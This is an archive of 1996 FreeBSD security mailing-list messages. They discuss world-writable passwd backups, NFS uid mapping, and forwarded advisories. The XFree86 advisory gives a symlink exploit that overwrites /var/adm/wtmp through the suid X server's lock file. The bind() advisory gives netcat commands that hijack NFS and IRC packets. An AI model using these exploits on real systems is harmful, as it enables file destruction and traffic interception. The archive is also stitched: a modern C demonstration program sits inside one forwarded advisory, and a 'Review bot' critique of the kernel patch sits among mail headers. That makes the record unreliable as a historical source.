From owner-freebsd-security Sun Jan 28 10:07:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA24294 for security-outgoing; Sun, 28 Jan 1996 10:07:40 -0800 (PST)
Received: from zap.io.org (zap.io.org [198.133.36.81]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id KAA24289 for ; Sun, 28 Jan 1996 10:07:37 -0800 (PST)
Received: (from taob@localhost) by zap.io.org (8.6.12/8.6.12) id NAA29338; Sun, 28 Jan 1996 13:07:04 -0500
Date: Sun, 28 Jan 1996 13:07:03 -0500 (EST)
From: Brian Tao
To: FREEBSD-SECURITY-L
Subject: Temporary passwd files in /etc?
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
Precedence: bulk

I found these two files lying around in the /etc directory of one
of our FreeBSD 2.1.0-RELEASE machines here.

-rw-r--r--  1 root  wheel  459403 Jan 20 15:35 pw.007939.orig
-rw-rw-rw-  1 root  wheel  612563 Jan 25 19:06 pw.021282~

pw.021282~ is a world readable/writeable copy of the master.passwd
file.  How did either of those files get there?  Do the serial numbers
on them look familiar to anyone (pids?).
-- 
Brian Tao (BT300, taob@io.org)
Systems Administrator, Internex Online Inc.
"Though this be madness, yet there is method in't"

From owner-freebsd-security Sun Jan 28 13:18:20 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA01705 for security-outgoing; Sun, 28 Jan 1996 13:18:20 -0800 (PST)
Received: from iaehv.IAEhv.nl (root@iaehv.IAEhv.nl [192.87.208.2]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id NAA01700 for ; Sun, 28 Jan 1996 13:18:17 -0800 (PST)
Received: from oasis.IAEhv.nl by iaehv.IAEhv.nl (8.6.12/1.63) id WAA07058; Sun, 28 Jan 1996 22:17:40 +0100
X-Disclaimer: iaehv.nl is a public access UNIX system and cannot be held responsible for the opinions of its individual users.
Received: by oasis.IAEhv.nl (8.6.12/1.63) id WAA00571; Sun, 28 Jan 1996 22:16:19 +0100
From: volf@oasis.IAEhv.nl (Frank Volf)
Message-Id: <199601282116.WAA00571@oasis.IAEhv.nl>
Subject: Re: Temporary passwd files in /etc?
To: taob@io.org (Brian Tao)
Date: Sun, 28 Jan 1996 22:16:18 +0100 (MET)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Brian Tao" at Jan 28, 96 01:07:03 pm
X-Mailer: ELM [version 2.4 PL25]
Content-Type: text
Sender: owner-security@freebsd.org
Precedence: bulk

Brian Tao wrote:
>
> I found these two files lying around in the /etc directory of one
> of our FreeBSD 2.1.0-RELEASE machines here.
>
> -rw-r--r--  1 root  wheel  459403 Jan 20 15:35 pw.007939.orig
> -rw-rw-rw-  1 root  wheel  612563 Jan 25 19:06 pw.021282~
>
> pw.021282~ is a world readable/writeable copy of the master.passwd
> file.  How did either of those files get there?  Do the serial numbers
> on them look familiar to anyone (pids?).

Hi,

We had a similar problem. These files are backup files created by the joe editor. There is a bug in some versions of this editor that creates the backup files with the wrong permissions. We solved the problem by installing version 2.8 of joe. This, however, does not prevent creating the backup files; they just have the correct permissions. If you don't want these files at all, you need to turn off the backup option of joe for root.

Regards,

Frank

----------------------------------------------------------------------------
Frank Volf - Internet Access Eindhoven - Digitale Stad Eindhoven
----------------------------------------------------------------------------
||  volf@oasis.IAEhv.nl  - use for personal mail                          ||
||  volf@IAEhv.nl        - use for Internet Access Eindhoven related mail ||
||  volf@dse.dse.nl      - use for Digital City of Eindhoven related mail ||
----------------------------------------------------------------------------
IAE Public Access Unix System - Dial +31.40.2439436 and login as new.
----------------------------------------------------------------------------

From owner-freebsd-security Sun Jan 28 13:38:11 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id NAA02789 for security-outgoing; Sun, 28 Jan 1996 13:38:11 -0800 (PST)
Received: from ibp.ibp.fr (ibp.ibp.fr [132.227.60.30]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id NAA02779 for ; Sun, 28 Jan 1996 13:38:07 -0800 (PST)
Received: from blaise.ibp.fr (blaise.ibp.fr [132.227.60.1]) by ibp.ibp.fr (8.6.12/jtpda-5.0) with ESMTP id WAA29947 ; Sun, 28 Jan 1996 22:37:57 +0100
Received: from (uucp@localhost) by blaise.ibp.fr (8.6.12/jtpda-5.0) with UUCP id WAA11977 ; Sun, 28 Jan 1996 22:37:30 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.7.3/keltia-uucp-2.7) id WAA18393; Sun, 28 Jan 1996 22:15:41 +0100 (MET)
From: Ollivier Robert
Message-Id: <199601282115.WAA18393@keltia.freenix.fr>
Subject: Re: Temporary passwd files in /etc?
To: taob@io.org (Brian Tao)
Date: Sun, 28 Jan 1996 22:15:40 +0100 (MET)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Brian Tao" at "Jan 28, 96 01:07:03 pm"
X-Operating-System: FreeBSD 2.2-CURRENT ctm#1586
X-Mailer: ELM [version 2.4ME+ PL3 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
Precedence: bulk

It seems that Brian Tao said:
> -rw-rw-rw-  1 root  wheel  612563 Jan 25 19:06 pw.021282~

> pw.021282~ is a world readable/writeable copy of the master.passwd
> file.  How did either of those files get there?  Do the serial numbers
> on them look familiar to anyone (pids?).

Yes, you're using vipw with EDITOR/VISUAL=emacs and you have a umask problem. It should not be 666.

I have a cron job that wipes them every day, but they're always 600!
-- 
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.frmug.fr.net
FreeBSD keltia.freenix.fr 2.2-CURRENT #1: Sun Jan 14 20:23:45 MET 1996

From owner-freebsd-security Sun Jan 28 15:03:29 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id PAA08881 for security-outgoing; Sun, 28 Jan 1996 15:03:29 -0800 (PST)
Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id PAA08871 for ; Sun, 28 Jan 1996 15:03:20 -0800 (PST)
Received: from msmith@localhost by genesis.atrad.adelaide.edu.au (8.6.12/8.6.9) id JAA08301; Mon, 29 Jan 1996 09:45:30 +1030
From: Michael Smith
Message-Id: <199601282315.JAA08301@genesis.atrad.adelaide.edu.au>
Subject: Re: Temporary passwd files in /etc?
To: taob@io.org (Brian Tao)
Date: Mon, 29 Jan 1996 09:45:29 +1030 (CST)
Cc: freebsd-security@freebsd.org
In-Reply-To: from "Brian Tao" at Jan 28, 96 01:07:03 pm
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
Precedence: bulk

Brian Tao stands accused of saying:
>
> I found these two files lying around in the /etc directory of one
> of our FreeBSD 2.1.0-RELEASE machines here.
>
> -rw-r--r--  1 root  wheel  459403 Jan 20 15:35 pw.007939.orig
> -rw-rw-rw-  1 root  wheel  612563 Jan 25 19:06 pw.021282~
>
> pw.021282~ is a world readable/writeable copy of the master.passwd
> file.  How did either of those files get there?  Do the serial numbers
> on them look familiar to anyone (pids?).

The second is probably an emacs backup file. It looks like root has emacs as its editor, or someone su'd to root and root's .cshrc doesn't override EDITOR, and also has a really bogus umask setting. This is a _really_good_ reason not to ever use emacs as root's editor.

The former; hmm. .orig is a patch(1) thing; have you used diff/patch to pass changes to your password database around?
> Brian Tao (BT300, taob@io.org)

-- 
]] Mike Smith, Software Engineer        msmith@atrad.adelaide.edu.au    [[
]] Genesis Software                     genesis@atrad.adelaide.edu.au   [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
]] realtime instrument control          (ph/fax)  +61-8-267-3039        [[
]] "wherever you go, there you are" - Buckaroo Banzai                   [[

From owner-freebsd-security Sun Jan 28 23:00:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id XAA09455 for security-outgoing; Sun, 28 Jan 1996 23:00:40 -0800 (PST)
Received: from statler.csc.calpoly.edu (statler-srv.csc.calpoly.edu [129.65.241.4]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id XAA09449 for ; Sun, 28 Jan 1996 23:00:37 -0800 (PST)
Received: (from nlawson@localhost) by statler.csc.calpoly.edu (8.6.12/N8) id XAA04062; Sun, 28 Jan 1996 23:00:32 -0800
From: Nathan Lawson
Message-Id: <199601290700.XAA04062@statler.csc.calpoly.edu>
Subject: Re: Ownership of files/tcp_wrappers port
To: wam@fedex.com (William McVey)
Date: Sun, 28 Jan 1996 23:00:32 -0800 (PST)
Cc: security@freebsd.org
In-Reply-To: <199601261956.AA03214@gateway.fedex.com> from "William McVey" at Jan 26, 96 01:58:36 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
Precedence: bulk

> Paul Richards wrote:
> >guys, these are NFS problems. If you want to stop people su'ing to bin
> >then map bin to nobody as well.
>
> I am at a loss as to why we'd want to build band-aids to gloss over
> a problem, rather than the problem itself.  It has been mentioned
> before that UNIX was designed to have a single well protected
> administrative id (root).  Why would we want multiple accounts that
> now need to have an equivalent amount of protection?  You suggest
> that we should fix the NFS to treat 'bin' special as well as root.

One small problem here that no one has mentioned yet: NFS works by uid, not by account name. Therefore, we'd have to remap uid 1 (bin on most systems), uid 3 (bin on SunOS), or who knows how many other uids? Once you find yourself doing that, you might as well write your own Unix. Let's fix the cause, not patch the symptoms.

-Nate

From owner-freebsd-security Mon Jan 29 11:45:06 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA25550 for security-outgoing; Mon, 29 Jan 1996 11:45:06 -0800 (PST)
Received: from passer.osg.gov.bc.ca (passer.osg.gov.bc.ca [142.32.110.29]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id LAA25510 for ; Mon, 29 Jan 1996 11:44:45 -0800 (PST)
Received: from localhost (localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.7.3/8.6.10) with SMTP id LAA11338 for freebsd-security@freebsd.org; Mon, 29 Jan 1996 11:44:35 -0800 (PST)
From: Cy Schubert - BCSC Open Systems Group
Message-Id: <199601291944.LAA11338@passer.osg.gov.bc.ca>
X-Authentication-Warning: passer.osg.gov.bc.ca: Host localhost [127.0.0.1] didn't use HELO protocol
Reply-to: cschuber@orca.gov.bc.ca
X-Mailer: DXmail
To: freebsd-security@freebsd.org
Subject: XFree86 3.1.2 Security Problems
Date: Mon, 29 Jan 96 11:44:35 -0800
X-Mts: smtp
Sender: owner-security@freebsd.org
Precedence: bulk

I just received this from another security news group. I haven't had a chance to verify this under FreeBSD (at home); however, I have no reason to believe that this wouldn't affect FreeBSD as well. Would anyone be willing to comment on this?

Regards,                       Phone:  (604)389-3827
Cy Schubert                    OV/VM:  BCSC02(CSCHUBER)
Open Systems Support           BITNET: CSCHUBER@BCSC02.BITNET
BC Systems Corp.               Internet: cschuber@uumail.gov.bc.ca
                                         cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."

------- Forwarded Message

There are security holes in XFree86 3.1.2, which installs its servers as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files, it does not take proper precautions to ensure that file permissions are maintained, resulting in the ability to overwrite files, and to read limited portions of other files.

The first problem stems from the server opening a temporary file, /tmp/.tX0-lock, with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this file a symlink, the server will overwrite the original file, and then write to it its current pid.

Other problems exist in the server relating to similar problems; one such example is the ability to specify an arbitrary file for the XF86config file, which will then be opened, and the first line that fails to match the expected format will be output with an error, allowing a line to be read from an arbitrary file.
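As an added illustration of the lock-file problem described above (this is not part of the forwarded advisory and not XFree86 code), the following C program places the advisory's O_CREAT|O_TRUNC open() pattern next to a hardened replacement and exercises both against constructed files in a private temporary directory. The directory name, the "wtmp" stand-in file, its contents and the demo() harness are this example's own assumptions.

```c
/* Added example (not from the advisory or from XFree86): the lock-file
 * open() pattern the advisory describes, next to a hardened replacement,
 * run against constructed files in a private temp directory. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The advisory's pattern: O_TRUNC follows a symlink and empties whatever it
 * points at, and the pid written afterwards lands in that file. */
static int lock_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: O_EXCL refuses any existing path (a symlink included),
 * O_NOFOLLOW refuses to traverse a symlink, and fstat() confirms the
 * descriptor is a fresh regular file we own before anything is written. */
static int lock_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;                       /* EEXIST or ELOOP: do not proceed */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Write the pid the way an X server records it in its lock file. */
static int write_pid(int fd, pid_t pid)
{
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%10ld\n", (long)pid);
    return (n > 0 && write(fd, buf, (size_t)n) == n) ? 0 : -1;
}

static off_t file_size(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0 ? st.st_size : -1;
}

/* Demonstration: a constructed victim file and a symlink planted at the
 * predictable lock path. Returns 1 when the hardened open refuses and leaves
 * the victim intact while the unsafe open truncates it, 0 if either
 * observation fails, -1 on setup error. */
int demo(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX";            /* constructed scratch dir */
    if (mkdtemp(dir) == NULL)
        return -1;
    char victim[256], lockpath[256], fresh[256];
    snprintf(victim, sizeof victim, "%s/wtmp", dir);
    snprintf(lockpath, sizeof lockpath, "%s/.tX0-lock", dir);
    snprintf(fresh, sizeof fresh, "%s/.tX1-lock", dir);

    const char *orig = "constructed login records\n"; /* stands in for wtmp */
    int fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0 || write(fd, orig, strlen(orig)) != (ssize_t)strlen(orig))
        return -1;
    close(fd);
    if (symlink(victim, lockpath) < 0)
        return -1;

    int ok = 1;
    /* 1. the hardened open must refuse the symlinked path, victim untouched */
    fd = lock_safe(lockpath);
    if (fd >= 0) { close(fd); ok = 0; }
    if (file_size(victim) != (off_t)strlen(orig)) ok = 0;

    /* 2. the hardened open on a clean path still works as a lock file */
    fd = lock_safe(fresh);
    if (fd < 0 || write_pid(fd, getpid()) < 0) ok = 0;
    if (fd >= 0) close(fd);

    /* 3. the advisory's open follows the symlink and truncates the victim */
    fd = lock_unsafe(lockpath);
    if (fd < 0) ok = 0;
    else { write_pid(fd, getpid()); close(fd); }
    if (file_size(victim) == (off_t)strlen(orig)) ok = 0;

    unlink(fresh); unlink(lockpath); unlink(victim); rmdir(dir);
    return ok;
}

int main(void)
{
    int r = demo();
    if (r == 1)
        puts("hardened open refused the symlink; unsafe open clobbered the file");
    else
        printf("unexpected result %d\n", r);
    return r == 1 ? 0 : 1;
}
```

The fstat() checks after a successful O_EXCL open are belt and braces: O_EXCL already guarantees the file was created by this call, so the real work is done by O_EXCL plus O_NOFOLLOW; the point of the harness is that the only difference between the clobbered and the intact victim is those two flags.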
Program:                    XFree86 3.1.2 servers
Affected Operating Systems: All systems with XFree86 3.1.2 installed
Requirements:               account on system
Temporary Patch:            chmod o-x /usr/X11R6/bin/XF86*
Security Compromise:        overwrite arbitrary files
Author:                     Dave M. (davem@cmu.edu)
Synopsis:                   While running suid root, XFree86 servers do not properly check file permissions, allowing a user to overwrite arbitrary files on a system.

Exploit:

$ ls -l /var/adm/wtmp
- -rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
$ ln -s /var/adm/wtmp /tmp/.tX0-lock
$ startx
(At this point exit X if it started, or else ignore any error messages)
$ ls -l /var/adm/wtmp
- -r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp

 /-------------\
 |David Meltzer|
 |davem@cmu.edu|
 /--------------------------\
 |School of Computer Science|
 |Carnegie Mellon University|
 \--------------------------/

------- End of Forwarded Message

From owner-freebsd-security Mon Jan 29 16:34:23 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id QAA27743 for security-outgoing; Mon, 29 Jan 1996 16:34:23 -0800 (PST)
Received: from zap.io.org (zap.io.org [198.133.36.81]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id QAA27702 for ; Mon, 29 Jan 1996 16:34:10 -0800 (PST)
Received: (from taob@localhost) by zap.io.org (8.6.12/8.6.12) id TAA21938; Mon, 29 Jan 1996 19:33:23 -0500
Date: Mon, 29 Jan 1996 19:33:23 -0500 (EST)
From: Brian Tao
To: freebsd-security@freebsd.org
Subject: Re: Temporary passwd files in /etc?
In-Reply-To: <199601282315.JAA08301@genesis.atrad.adelaide.edu.au>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
Precedence: bulk

On Mon, 29 Jan 1996, Michael Smith wrote:
>
> The second is probably an emacs backup file.  It looks like root has
> emacs as its editor, or someone su'd to root and root's .cshrc doesn't
> override EDITOR, and also has a really bogus umask setting.  This is a
> _really_good_ reason not to ever use emacs as root's editor.

It turns out that our programmer was testing out a perl-based passwd file massager that created a temporary file with a ~ at the end (he is an emacs user). He had inadvertently set his umask in the perl script to (umask() & 700) rather than 077, and that's how it ended up mode 666.

> The former; hmm.  .orig is a patch(1) thing; have you used diff/patch to
> pass changes to your password database around?

I don't know about this one. It was created before the perl script was in use and thankfully did not contain a copy of the encrypted passwords.

Thanks to all who mailed back suggestions about the origins of the passwd files.
-- 
Brian Tao (BT300, taob@io.org)
Systems Administrator, Internex Online Inc.
"Though this be madness, yet there is method in't"

From owner-freebsd-security Wed Jan 31 00:27:00 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id AAA00609 for security-outgoing; Wed, 31 Jan 1996 00:27:00 -0800 (PST)
Received: from relay.philips.nl (ns.philips.nl [130.144.65.1]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id AAA00601 for ; Wed, 31 Jan 1996 00:26:50 -0800 (PST)
Received: (from smap@localhost) by relay.philips.nl (8.6.9/8.6.9-950414) id JAA20152 for ; Wed, 31 Jan 1996 09:26:17 +0100
Received: from unknown(192.26.173.32) by ns.philips.nl via smap (V1.3+ESMTP) with ESMTP id sma019888; Wed Jan 31 09:24:01 1996
Received: from spooky.lss.cp.philips.com (spooky.lss.cp.philips.com [130.144.199.105]) by smtp.nl.cis.philips.com (8.6.10/8.6.10-0.9z-02May95) with ESMTP id JAA18522 for ; Wed, 31 Jan 1996 09:24:42 +0100
Received: (from guido@localhost) by spooky.lss.cp.philips.com (8.6.10/8.6.10-0.991c-08Nov95) id JAA20374 for freebsd-security@freebsd.org; Wed, 31 Jan 1996 09:23:51 +0100
Received: from smtp.nl.cis.philips.com (ns.nl.cis.philips.com [192.26.173.32]) by spooky.lss.cp.philips.com (8.6.10/8.6.10-0.991c-08Nov95) with ESMTP id AAA10125 for ; Wed, 31 Jan 1996 00:15:56 +0100
Received: from relay.philips.nl ([130.144.65.129]) by smtp.nl.cis.philips.com (8.6.10/8.6.10-0.9z-02May95) with ESMTP id AAA00701 for ; Wed, 31 Jan 1996 00:16:45 +0100
Received: (from smap@localhost) by relay.philips.nl (8.6.9/8.6.9-950414) id AAA24703 for ; Wed, 31 Jan 1996 00:15:54 +0100
Received: from sydney2.world.net(198.142.12.2) by ns.philips.nl via smap (V1.3+ESMTP) with ESMTP id sma024680; Wed Jan 31 00:15:32 1996
Received: from suburbia.net (suburbia.net [203.4.184.1]) by world.net (8.7.1/8.6.6) with ESMTP id KAA21447; Wed, 31 Jan 1996 10:10:25 +1100 (EST)
Received: (majordom@localhost) by suburbia.net (8.7.3/Proff-950810) id KAA18813 for best-of-security-outgoing; Wed, 31 Jan 1996 10:01:41 +1100
X-Authentication-Warning: suburbia.net: majordom set sender to owner-best-of-security using -f
Received: from world.net (sydney2.world.net [198.142.12.2]) by suburbia.net (8.7.3/Proff-950810) with ESMTP id KAA18805 for ; Wed, 31 Jan 1996 10:01:35 +1100
Received: from underground.org (underground.org [205.164.71.100]) by world.net (8.7.1/8.6.6) with ESMTP id KAA15135 for ; Wed, 31 Jan 1996 10:01:03 +1100 (EST)
Received: (from aleph1@localhost) by underground.org (8.7.1/8.7.1) id PAA04830; Tue, 30 Jan 1996 15:18:22 -0800
Date: Tue, 30 Jan 1996 15:18:21 -0800 (PST)
From: "Aleph's K-Rad GECOS Field"
To: linux-security@tarsier.cv.nrao.edu
cc: linux-alert@tarsier.cv.nrao.edu, bugtraq@crimelab.com, best-of-security@suburbia.net
Subject: BoS: bind() Security Problems
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Reply-To: nobody@mail.uu.net
Sender: owner-security@FreeBSD.ORG
Precedence: bulk

System Call:                bind()
Affected Operating System:  Linux, SunOS, FreeBSD, BSDI, Ultrix
                            Probably others.
Requirement:                account on system.
Security Compromise:        Stealing packets from nfsd, yppasswd, ircd, etc.
Credits:                    *Hobbit*
                            bitblt
                            Aleph One
Synopsis:                   bind() does not properly check to make sure there is not a socket already bound to INADDR_ANY on the same port when binding to a specific address.

On most systems, a combination of setting the SO_REUSEADDR socket option and a call to bind() allows any process to bind to a port to which a previous process has bound with INADDR_ANY. This allows a user to bind to the specific address of a server bound to INADDR_ANY on an unprivileged port, and steal its udp packets/tcp connection.

Exploit:

Download and compile netcat from ftp://ftp.avian.org/src/hacks/nc100.tgz

Make sure an nfs server is running:

w00p% netstat -a | grep 2049
udp        0      0  *.2049                 *.*                    LISTEN

Run netcat:

w00p% nc -v -v -u -s 192.88.209.5 -p 2049
listening on [192.88.209.5] 2049 ...

Wait for packets to arrive.

Fix:

Linux: A patch has been sent to Linus and Alan Cox. It should be included with 1.3.60. My original patch (included below) allows for binds from the same uid, as some virtual hosting software like modified httpds and ftpds may break otherwise. Alan didn't like this, so all binds to the same port will not be allowed in newer kernels. You should be able to easily adapt this patch or Alan's patch to 1.2.13 without much trouble.

Others: Pray to your vendors.
--- begin patch ---
diff -u --recursive --new-file linux-1.3.57/net/ipv4/af_inet.c linux/net/ipv4/af_inet.c
--- linux-1.3.57/net/ipv4/af_inet.c     Mon Dec 25 20:03:01 1995
+++ linux/net/ipv4/af_inet.c    Tue Jan 16 19:46:28 1996
@@ -46,6 +46,8 @@
  *              Germano Caronni :       Assorted small races.
  *              Alan Cox        :       sendmsg/recvmsg basic support.
  *              Alan Cox        :       Only sendmsg/recvmsg now supported.
+ *              Aleph One       :       Rogue processes could steal packets
+ *                                      from processes bound to INADDR_ANY.
  *
  *              This program is free software; you can redistribute it and/or
  *              modify it under the terms of the GNU General Public License
@@ -899,6 +901,12 @@
                        if (sk2->num != snum)
                                continue;               /* more than one */
 
+                       if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) &&
+                           current->euid != sk2->socket->inode->i_uid)
+                       {
+                               sti();
+                               return(-EADDRINUSE);
+                       }
                        if (sk2->rcv_saddr != sk->rcv_saddr)
                                continue;               /* socket per slot ! -FB */
                        if (!sk2->reuse || sk2->state==TCP_LISTEN)

Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

From owner-freebsd-security Wed Jan 31 10:55:03 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id KAA29244 for security-outgoing; Wed, 31 Jan 1996 10:55:03 -0800 (PST)
Received: from puli.cisco.com (puli.cisco.com [171.69.1.174]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id KAA29238 Wed, 31 Jan 1996 10:55:01 -0800 (PST)
Received: from localhost.cisco.com (localhost.cisco.com [127.0.0.1]) by puli.cisco.com (8.6.8+c/8.6.5) with SMTP id KAA05100; Wed, 31 Jan 1996 10:54:27 -0800
Message-Id: <199601311854.KAA05100@puli.cisco.com>
To: security@freebsd.org, wollman@freebsd.org
Subject: [cisco.external.bugtraq] Re: BoS: bind() Security Problems
Date: Wed, 31 Jan 1996 10:54:27 -0800
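Review bot: in the @@ -899,6 +901,12 @@ hunk the new test `if ((sk2->rcv_saddr == 0 || sk->rcv_saddr == 0) && current->euid != sk2->socket->inode->i_uid)` only rejects when one of the two sockets is a wildcard (INADDR_ANY) binding, so two sockets bound by different uids to the same specific address, or to different specific addresses, still fall through to the existing `rcv_saddr` and `reuse` checks below it; a one-line comment saying that this is deliberate (it closes only the wildcard case the advisory describes) would save the next reader from wondering. Two smaller points: the check compares the caller's `current->euid` with the other socket's inode `i_uid`, i.e. the owner recorded on that socket's inode rather than the euid of whoever called bind() on it, and the hunk does not say which identity is meant; and the early `return(-EADDRINUSE)` does its own `sti()`, which must match how the other error exits in this loop restore interrupts (not visible in the hunk). The covering mail explains that the same-uid exemption exists so that modified httpds and ftpds keep working; that rationale belongs in the source next to the attribution line added in the @@ -46,6 +46,8 @@ hunk, not only in the mail.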
From: Paul Traina
Sender: owner-security@freebsd.org
Precedence: bulk

Yuck, I hate to think of what we're going to break when we fix this, but we should definitely fix this, otherwise users can hose NFS & friends.

Paul

p.s. I haven't looked at our code yet to verify this bug.

------- Forwarded Message
From: Bernd.Lehle@rus.uni-stuttgart.de (Bernd Lehle)
To: Multiple recipients of list BUGTRAQ
Newsgroups: cisco.external.bugtraq
Subject: Re: BoS: bind() Security Problems
Date: 31 Jan 1996 04:18:29 PST
Organization: Internet-USENET Gateway at cisco Systems
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

>
>
> System Call:                bind()
> Affected Operating System:  Linux, SunOS, FreeBSD, BSDI, Ultrix
>                             Probably others.
> Requirement:                account on system.
> Security Compromise:        Stealing packets from
>                             nfsd, yppasswd, ircd, etc.
> Credits:                    *Hobbit*
>                             bitblt
>                             Aleph One
> Synopsis:                   bind() does not properly check
>                             to make sure there is not a socket
>                             already bound to INADDR_ANY on the same
>                             port when binding to a specific address.
>

IRIX 5.3 is vulnerable, too.

> Exploit:

[..]

> Run netcat:
>
> w00p% nc -v -v -u -s 192.88.209.5 -p 2049
> listening on [192.88.209.5] 2049 ...

To take a look at irc packets:

nc -v -v -l -s Your.IP.Adress -p 6667

-- 
> Bernd Lehle - Stuttgart University Computer Center   * A supercomputer <
> Visualization / SFB 382 / Astrophysics               * is a machine    <
> lehle@rus.uni-stuttgart.de   Tel:+49-711-685-5531    * that runs an    <
> http://www.tat.physik.uni-tuebingen.de/~lehle        * endless loop    <
> pgp? -> finger bernd@visbl.rus.uni-stuttgart.de      * in 2 seconds    <

------- End of Forwarded Message

From owner-freebsd-security Wed Jan 31 11:30:25 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id LAA02619 for security-outgoing; Wed, 31 Jan 1996 11:30:25 -0800 (PST)
Received: from halloran-eldar.lcs.mit.edu (halloran-eldar.lcs.mit.edu [18.26.0.159]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id LAA02604 for ; Wed, 31 Jan 1996 11:30:19 -0800 (PST)
Received: by halloran-eldar.lcs.mit.edu; (5.65/1.1.8.2/19Aug95-0530PM) id AA00772; Wed, 31 Jan 1996 14:30:09 -0500
Date: Wed, 31 Jan 1996 14:30:09 -0500
From: "Garrett A. Wollman"
Message-Id: <9601311930.AA00772@halloran-eldar.lcs.mit.edu>
To: Paul Traina
Cc: security@freebsd.org
Subject: [cisco.external.bugtraq] Re: BoS: bind() Security Problems
In-Reply-To: <199601311854.KAA05100@puli.cisco.com>
References: <199601311854.KAA05100@puli.cisco.com>
Sender: owner-security@freebsd.org
Precedence: bulk

< said:
> Yuck, I hate to think of what we're going to break when we fix this, but
> we should definitely fix this, otherwise users can hose NFS & friends.

Lots of stuff will get broken. Although, it occurs to me...

It should be possible to require that SO_REUSEPORT be specified on both the original and the duplicate sockets. This way, those programs (like ALL UDP-based servers) for which this is a requirement will still be able to work with a minimum of modification. We can't, however, require any modifications where multicast addresses are involved.

-GAWollman

-- 
Garrett A. Wollman   | Shashish is simple, it's discreet, it's brief. ...
wollman@lcs.mit.edu  | Shashish is the bonding of hearts in spite of distance.
Opinions not those of| It is a bond more powerful than absence.  We like people
MIT, LCS, ANA, or NSA| who like Shashish.  - Claude McKenzie + Florent Vollant

From owner-freebsd-security Wed Jan 31 12:09:13 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id MAA05537 for security-outgoing; Wed, 31 Jan 1996 12:09:13 -0800 (PST)
Received: from mail.vividnet.com (mail.vividnet.com [206.149.144.3]) by freefall.freebsd.org (8.7.3/8.7.3) with SMTP id MAA04816 for ; Wed, 31 Jan 1996 12:04:24 -0800 (PST)
Received: from aquarius.vividnet.com (postmaster@mail.vividnet.com) by mail.vividnet.com (8.6.12/8.6.9) with ESMTP id MAA00900 for ; Wed, 31 Jan 1996 12:02:30 -0800
Received: (postmaster@aquarius.vividnet.com) by aquarius.vividnet.com (8.6.12/8.6.9) id MAA01816; Wed, 31 Jan 1996 12:02:09 -0800
Date: Wed, 31 Jan 1996 12:02:09 -0800 (PST)
From: Brian Wang
